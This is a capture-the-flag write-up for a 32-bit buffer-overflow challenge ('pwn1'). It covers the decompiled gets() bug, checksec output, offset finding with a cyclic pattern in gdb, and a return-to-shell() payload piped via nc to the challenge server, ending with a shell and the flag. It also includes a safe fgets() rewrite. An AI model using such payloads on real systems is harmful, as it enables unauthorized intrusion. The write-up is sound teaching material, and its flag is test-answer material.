PWN 1

Category : Pwning/Binary Exploitation

As usual we are given a binary to exploit.

Let’s decompile it in Ghidra

undefined4 main(void)

{
  char local_90 [140];           // 140-byte stack buffer
  
  setvbuf(stdout,(char *)0x0,2,0);
  printf("Tell me your name: ");
  gets(local_90);                // no length check: input past 140 bytes overwrites saved EBP/EIP
  printf("Hello, %s\n",local_90);
  return 0;
}

A simple stack buffer overflow: gets() reads an unbounded line into a 140-byte stack buffer, so anything past that runs over the saved frame pointer and return address.
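For contrast, here is a bounded version of the same main(), added here as an example and not taken from the challenge binary: fgets() with the buffer size replaces gets(), the newline is stripped, and any over-long remainder of the line is drained. read_name_from_string() is a hypothetical helper for feeding constructed input through fmemopen().

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

#define NAME_LEN 140  /* same buffer size as the decompiled main() */

/* Bounded replacement for the gets() call: stores at most bufsz-1 bytes,
   strips a trailing newline, and discards the rest of an over-long line
   so the leftover bytes are not read as the next input. Returns the number
   of bytes stored, or -1 on EOF/error. */
int read_name(char *buf, size_t bufsz, FILE *in)
{
    if (bufsz == 0 || fgets(buf, (int)bufsz, in) == NULL)
        return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[--len] = '\0';          /* whole line fit: drop the newline */
    } else {
        int c;                      /* line was truncated: drain the rest */
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }
    return (int)len;
}

/* Hypothetical test helper: run read_name() over an in-memory string
   (constructed input, not the challenge's own code). */
int read_name_from_string(char *buf, size_t bufsz, const char *input)
{
    FILE *in = fmemopen((void *)input, strlen(input), "r");
    if (in == NULL)
        return -1;
    int n = read_name(buf, bufsz, in);
    fclose(in);
    return n;
}

int main(void)
{
    char name[NAME_LEN];
    setvbuf(stdout, NULL, _IONBF, 0);
    printf("Tell me your name: ");
    if (read_name(name, sizeof name, stdin) < 0)
        return 1;
    printf("Hello, %s\n", name);   /* a 200-byte line is cut to 139 bytes */
    return 0;
}
```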

Let’s checksec it

checksec pwn1 
[*] '/home/vipul/Desktop/EncryptCTF/pwn1_SOLVED/pwn1'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

Since NX is enabled, the stack is not executable, so we can't inject shellcode. But we don't have to: the binary ships a function that spawns a shell for us, so we only need to redirect the return address to it.

void shell(void)

{
  system("/bin/bash");
  return;
}

2 Steps of Buffer Overflow

1) Find the offset to the saved return address
2) Find the address of the function to call

For step 1

Using pwntools' cyclic(n) we generate a de Bruijn pattern that crashes the program; the 4 bytes that land in EIP are unique within the pattern, so cyclic_find() on that value gives the offset.

Reading symbols from ./pwn1...(no debugging symbols found)...done.
gdb-peda$ r
Starting program: /home/vipul/Desktop/EncryptCTF/pwn1_SOLVED/pwn1 
Tell me your name: aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab
Hello, aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab

Program received signal SIGSEGV, Segmentation fault.


[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x0 
ECX: 0xffffffff 
EDX: 0xf7fac890 --> 0x0 
ESI: 0xf7fab000 --> 0x1dcd6c 
EDI: 0xf7fab000 --> 0x1dcd6c 
EBP: 0x6261616a ('jaab')
ESP: 0xffffd480 ("laabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
EIP: 0x6261616b ('kaab')
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x6261616b
[------------------------------------stack-------------------------------------]
0000| 0xffffd480 ("laabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
0004| 0xffffd484 ("maabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
0008| 0xffffd488 ("naaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
0012| 0xffffd48c ("oaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab")
0016| 0xffffd490 ("paabqaabraabsaabtaabuaabvaabwaabxaabyaab")
0020| 0xffffd494 ("qaabraabsaabtaabuaabvaabwaabxaabyaab")
0024| 0xffffd498 ("raabsaabtaabuaabvaabwaabxaabyaab")
0028| 0xffffd49c ("saabtaabuaabvaabwaabxaabyaab")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x6261616b in ?? ()
>>> from pwn import *
>>> cyclic(200)
'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
>>> cyclic_find(0x6261616b)
140

That gives an offset of 140. For the address of the shell function:

gdb-peda$ info address shell
Symbol "shell" is at 0x80484ad in a file compiled without debugging.

The exploit

vipul@ubuntu:~$ python -c "from pwn import *; print('A'*140 +p32(0x80484ad))" > exploit
vipul@ubuntu:~$ cat exploit - | nc 104.154.106.182 2345
Tell me your name: Hello, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��
whoami
pwn1
ls
flag.txt
pwn1
cat flag.txt
encryptCTF{Buff3R_0v3rfl0W5_4r3_345Y}